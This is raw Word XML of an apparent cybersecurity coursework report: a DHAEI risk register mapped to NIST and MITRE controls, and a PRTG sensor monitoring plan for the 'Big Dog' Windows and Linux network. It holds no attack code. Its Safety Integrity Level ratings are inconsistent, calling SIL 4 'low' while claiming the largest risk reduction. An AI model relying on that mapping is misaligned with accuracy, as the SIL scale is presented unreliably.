        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125"/>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Frameworks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: NIST SP 800-53 (SA-9), MITRE ATT&amp;CK T1195.</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Ransomware Attack</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126"/>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Controls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Daily backups, access control, network segmentation.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126"/>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Priority</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: High; risk of operational disruption is severe.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126"/>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Frameworks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: NIST SP 800-53 (CP-9), Industry Canada for critical infrastructure, MITRE T1486.</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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Service Disruption</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>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Controls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Load balancing, redundant VPNs, continuous monitoring.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>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Priority</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Medium; affects service continuity.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: NIST RMF resilience guidance, MITRE T1499 for DoS.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700"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Unauthorized Access</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>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Controls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: MFA, RBAC, log analysis.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>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Priority</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Medium; integrity-focused with moderate impact.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>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Framework</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: NIST SP 800-53, MITRE T1078.</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Industry Canada Compliance</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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Aligning with Industry Canada’s requirements, DHAEI prioritizes infrastructure security and privacy, enhancing resilience and continuity in compliance with federal guidelines.</w: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Risk Controls and Monitoring</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">SOC Monitoring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: DHAEI’s SOC team utilizes MITRE ATT&amp;CK and NIST standards to monitor IoCs and flag activity anomalies.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Automated Alerts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Key IoCs, like unauthorized software installations and abnormal logins, trigger alerts.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Scanning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Regularly performed to identify and resolve potential risks.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Backup and Recovery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Redundant backups are scheduled, with quarterly drills testing recovery protocols.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:b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rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">References</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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National Institute of Standards and Technology. (2018). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">NIST SP 800-53 Rev. 5: Security and Privacy Controls for Information Systems</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. Retrieved from </w:t>
      </w:r>
      <w:hyperlink r:id="rId93" w:tooltip="https://nvlpubs.nist.gov/nistpubs" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://nvlpubs.nist.gov/nistpubs</w:t>
        </w:r>
      </w:hyperlink>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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MITRE Corporation. (2021). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Framework</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. Retrieved from </w:t>
      </w:r>
      <w:hyperlink r:id="rId94" w:tooltip="https://attack.mitre.org/" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://attack.mitre.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Equifax Data Breach. (2017). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Journal of Cybersecurity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. Retrieved from </w:t>
      </w:r>
      <w:hyperlink r:id="rId95" w:tooltip="https://www.journalofcybersecurity.com/equifax-breach" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.journalofcybersecurity.com/equifax-breach</w:t>
        </w:r>
      </w:hyperlink>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Government of Canada. (2020). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Canadian Privacy Laws and Infrastructure Protection Guidelines</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. Retrieved from- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Government of Canada</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. (2020). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Canadian Privacy Laws and Infrastructure Protection Guidelines</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. Retrieved from </w:t>
      </w:r>
      <w:hyperlink r:id="rId96" w:tooltip="https://www.canada.ca/en/industry" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.canada.ca/en/industry</w:t>
        </w:r>
      </w:hyperlink>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rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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2160"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Cat Scan II Big Dog </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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Executive Summary</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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">This report outlines a structured approach for monitoring and securing a mixed environment comprising Windows and Linux systems for "Big Dog." Given the client’s reliance on proprietary data, SQL-based applications, and critical network operations, I have </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">prioritized 20 essential sensors for centralized monitoring through PRTG. These sensors are selected based on their ability to detect, alert, and respond to key Indicators of Compromise (IOCs) across systems. They have been prioritized by Safety Integrity </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Level (SIL), with focus on data sensitivity, potential threat impacts, and continuity risks. Key SIL levels guide monitoring thresholds to reduce false positives while enabling timely, actionable alerts.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:b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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Table of Sensors</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="11"/>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346"/>
        <w:gridCol w:w="1346"/>
        <w:gridCol w:w="1346"/>
        <w:gridCol w:w="1346"/>
        <w:gridCol w:w="1346"/>
        <w:gridCol w:w="1346"/>
      </w:tblGrid>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Sensor Type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Purpose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System</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Associated IOCs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SIL Level</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Thresholds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SQL Server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General SQL performance, connection stats, response times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Unauthorized access, query spikes, unusual modifications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CPU usage, slow response times</w:t>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CPU usage &lt; 80%</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="207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Microsoft SQL v2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SQL transactions, query metrics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Abnormal SQL activity, high transaction rates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query execution times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WMI Event Log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system and security logs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 Workstations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Unauthorized logins, anomalous events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Frequent access anomalies</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1875"/>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File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Tracks unauthorized file changes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 Management</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Unexpected file modifications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Unexpected or rapid file changes</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1902"/>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Uptime Sensor (Windows)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Ensures system uptime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 Workstations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Server downtime, application crashes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(detects any downtime)</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Ping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Basic availability check</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IIS Server, Linux, Workstations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System offline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2 (High) Risk reduction by a factor &gt;100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(detects when unreachable)</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HTTP/HTTP Advanced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HTTP page status and response times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IIS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Delayed or timed-out HTTP requests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2 (High) Risk reduction by a factor &gt;100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response times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IIS Application Pool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Tracks health of IIS app pools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IIS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Unexpected restarts, increased app pool CPU usage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2 (High) Risk reduction by a factor &gt;100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CPU usage within pool</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IIS Application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specific IIS applications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IIS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Abnormal app behavior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2 (High) Risk reduction by a factor &gt;100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low performance changes</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2205"/>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PRTG Status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Ensures PRTG is operational</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PRTG downtime, missing logs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low monitoring gaps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PRTG Database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PRTG database health and performance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Database errors, slow queries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low performance changes</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="219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SNMP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Collects network performance metrics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 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Network anomalies, high packet loss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2 (High) Risk reduction by a factor &gt;100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if sudden drops, high if unusual spikes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WMI Security Center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firewall and antivirus status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Server, Workstations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Disabled firewall/antivirus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if disabled</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2325"/>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Syslog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Logs system activities to detect suspicious patterns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Linux, Kali</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Network anomalies, unusual log entries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4 (low) Risk reduction by a factor &gt;10,000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to detect any suspicious entries</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Packet Sniffer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network traffic for anomalies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Linux, Kali</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Unusual traffic patterns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4 (low) Risk reduction by a factor &gt;10,000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for spikes in unexpected traffic</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SSH CPU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CPU usage via SSH</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unexpected CPU usage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4 (low) Risk reduction by a factor &gt;10,000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CPU usage</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="174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SSH Memory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memory usage via SSH</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unexpected memory usage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4 (low) Risk reduction by a factor &gt;10,000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memory usage</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1968"/>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Disk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disk usage for availability</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Low disk space, unexpected usage spikes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spacing w:after="0" w:before="0" w:line="240"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r/>
          </w:p>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if low free space</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Network Sensor</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Monitors traffic load and patterns</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Windows, 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packet loss, unusual activity</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3 (Medium) Risk reduction by a factor &gt;1,000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High or low unexpected traffic</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>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b/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Uptime Sensor (Linux)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Ensures Linux system availability</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Linux</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Abnormal system downtime</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SIL 4 (low) Risk reduction by a factor &gt;10,000</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:sz="5" w:space="0"/>
              <w:left w:val="single" w:color="000000" w:sz="5" w:space="0"/>
              <w:bottom w:val="single" w:color="000000" w:sz="5" w:space="0"/>
              <w:right w:val="single" w:color="000000" w:sz="5" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1346" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr>
                <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
                <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
                <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
                <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
              </w:pBdr>
              <w:spacing w:after="0" w:before="0" w:line="288" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0" w:left="0"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Detects any downtime</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:b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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Discussion</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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">The integration of PRTG provides Cat with centralized monitoring that is efficient given her time constraints. Key considerations are based on each system’s role and the sensitivity of the data it handles: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1"/>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Windows Server (SIL 3): Due to the SQL database, IIS web server, and PRTG’s role, Windows Server receives heightened monitoring to ensure data integrity, confidentiality, and system availability. Alerts focus on preventing database tampering and detecting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">unauthorized access.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2"/>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IIS Web Server (SIL 2): Given its exposure to the public internet, IIS monitoring focuses on preventing service disruption and detecting potential unauthorized access. Network monitoring through HTTP and Ping sensors ensures quick detection of accessibilit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">y issues.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3"/>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Linux Development Server (SIL 4): To protect proprietary IP, this server has multiple sensors for monitoring system integrity, network traffic, and SSH access. Monitoring network anomalies is critical, as this system houses sensitive IP information.</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4"/>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Workstations (SIL 2-3): Workstations have moderate monitoring to ensure usability and security. Management workstations, which may contain sensitive information, are prioritized higher (SIL 3) compared to Sales/Marketing.</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5"/>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Kali Test Systems (SIL 1): Test systems are minimally monitored given their lower impact but still require basic monitoring to detect any unauthorized access that could potentially introduce vulnerabilities.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color w:val="000000"/>
          <w:sz w:val="24"/>
